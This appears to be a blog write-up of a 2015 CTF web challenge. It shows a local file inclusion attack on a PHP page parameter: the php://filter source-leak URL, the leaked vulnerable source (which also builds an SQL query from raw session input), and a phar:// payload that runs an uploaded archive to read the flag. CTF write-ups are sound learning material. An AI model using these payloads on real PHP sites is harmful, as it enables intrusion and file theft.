This problem is LFI vulnerable.
Problem Page [ http://magiagents.chal.mmactf.link/ ]
'indxe.php?page=settings' is vulnerable point.
file upload is settings page.
First I got a php source.
http://magiagents.chal.mmactf.link/index.php?page=php://filter/convert.base64-encode/resource=home
// home.php<div class="page-header"><h1>Home</h1></div> <img src="magi.jpg"> <?php if (isset($_SESSION["admin"]) && $_SESSION["admin"]) { echo file_get_contents("../flag"); }
// index.php <?php session_start(); if (!isset($_GET["page"]) || isset($page)) $page = "home"; else $page = $_GET["page"]; ?> <!DOCTYPE html> <html lang="en"> <head> <meta charset="utf-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width, initial-scale=1"> <!-- The above 3 meta tags *must* come first in the head; any other head content must come *after* these tags --> <meta name="description" content=""> <meta name="author" content=""> <link rel="icon" href="favicon.ico"> <title>Mortal Magi Agents</title> <!-- Bootstrap core CSS --> <link href="css/bootstrap.min.css" rel="stylesheet"> <!-- Custom styles for this template --> <link href="css/jumbotron.css" rel="stylesheet"> <!-- HTML5 shim and Respond.js for IE8 support of HTML5 elements and media queries --> <!--[if lt IE 9]> <script src="https://oss.maxcdn.com/html5shiv/3.7.2/html5shiv.min.js"></script> <script src="https://oss.maxcdn.com/respond/1.4.2/respond.min.js"></script> <![endif]--> </head> <body> <nav class="navbar navbar-inverse navbar-fixed-top"> <div class="container"> <div class="navbar-header"> <button type="button" class="navbar-toggle collapsed" data-toggle="collapse" data-target="#navbar" aria-expanded="false" aria-controls="navbar"> <span class="sr-only">Toggle navigation</span> <span class="icon-bar"></span> <span class="icon-bar"></span> <span class="icon-bar"></span> </button> <a class="navbar-brand" href="index.php">Mortal Magi Agents</a> </div> <div id="navbar" class="collapse navbar-collapse"> <ul class="nav navbar-nav"> <li class="active"><a href="?page=home">Home</a></li> <li><a href="?page=news">News</a></li> <li><a href="#contact">Contact</a></li> </ul> <?php if (isset($_SESSION["user"])) { ?> <ul class="nav navbar-nav navbar-right"> <li class='dropdown'> <a href="#" aria-expanded="false" class="dropdown-toggle" data-toggle="dropdown" role="button"> <?php if (isset($_SESSION["avator"])) { echo '<img src="'.$_SESSION['avator'].'" width="32" height="32">'; } echo $_SESSION["user"]; ?><span class='caret'></span></a> <ul class='dropdown-menu' role='menu'> <li><a href="?page=settings">Settings</a></li> <li><a href="logout.php">Sign out</a></li> </ul> </li> </ul> <?php } else { ?> <form class="navbar-form navbar-right" action="login.php" method="post"> <div class="form-group"> <input type="text" placeholder="User" class="form-control" name="user"> </div> <div class="form-group"> <input type="password" placeholder="Password" class="form-control" name="password"> </div> <button type="submit" class="btn btn-success" name="signin">Sign in</button> <button type="submit" class="btn btn-danger" name="signup">Sign up</button> </form> <?php } ?> </div><!--/.nav-collapse --> </div> </nav> <!-- Main jumbotron for a primary marketing message or call to action --> <!-- <div class="jumbotron"> </div> --> <div class="container"> <?php include("$page.php"); ?> </div> <hr> <footer> <p>Mortal Magi Agents 2015</p> </footer> </div> <!-- /container --> <!-- Bootstrap core JavaScript ================================================== --> <!-- Placed at the end of the document so the pages load faster --> <script src="https://ajax.googleapis.com/ajax/libs/jquery/1.11.3/jquery.min.js"></script> <script src="js/bootstrap.min.js"></script> </body> </html>
// settings.php <?php require "./db.php"; if (isset($_FILES["file"])) { if ($_FILES['file']['type'] == "image/jpeg") { $ext = ".jpg"; } else if ($_FILES['file']['type'] == "image/gif") { $ext = ".gif"; } else if ($_FILES['file']['type'] == "image/png") { $ext = ".png"; } $filename = "avators/" . $_SESSION["user"] . sha1_file($_FILES['file']['tmp_name']) . $ext; move_uploaded_file($_FILES['file']['tmp_name'], $filename); $_SESSION["avator"] = $filename; $db = connect_db(); $db->query("UPDATE users SET avator = '$filename' WHERE name = '".$_SESSION['user']."'"); } ?> <div class="page-header"><h1>Settings</h1></div> <h2>Avator</h2> <?php if (isset($_SESSION["avator"])) { ?> <img src="<?php echo $_SESSION['avator']; ?>" width="64" height="64"> <?php } ?> <h3>New avator</h3> <form method="POST" enctype="multipart/form-data"> <input type="file" name="file"> <input type="submit"> </form>
upload file name is 'user'+sha1(filename)
but, this name is no problem.
i used phar://
getflag.php
<?php echo file_get_contents('../flag');?>
http://magiagents.chal.mmactf.link/?page=phar:///var/www/html/avators/afafafb347d0cf8bd02e7ddd7c018e74fa336beff2b0b5.jpg/getflag
MMA{5ded4df85bb8785f9cff08268703278c4e18e3fd}
Good
Flag is MMA{5ded4df85bb8785f9cff08268703278c4e18e3fd}
'0x400 CTF > 0x401 MMA 1st 2015' 카테고리의 다른 글
[Crypto] Twin Prime - 50pts (0) | 2016.09.05 |
---|---|
[Web] Global Page - 50pts (0) | 2016.09.05 |
[Web] Get the admin password! - 100pts (0) | 2016.09.05 |
[Web] Login as admin! - 30pts (0) | 2015.09.08 |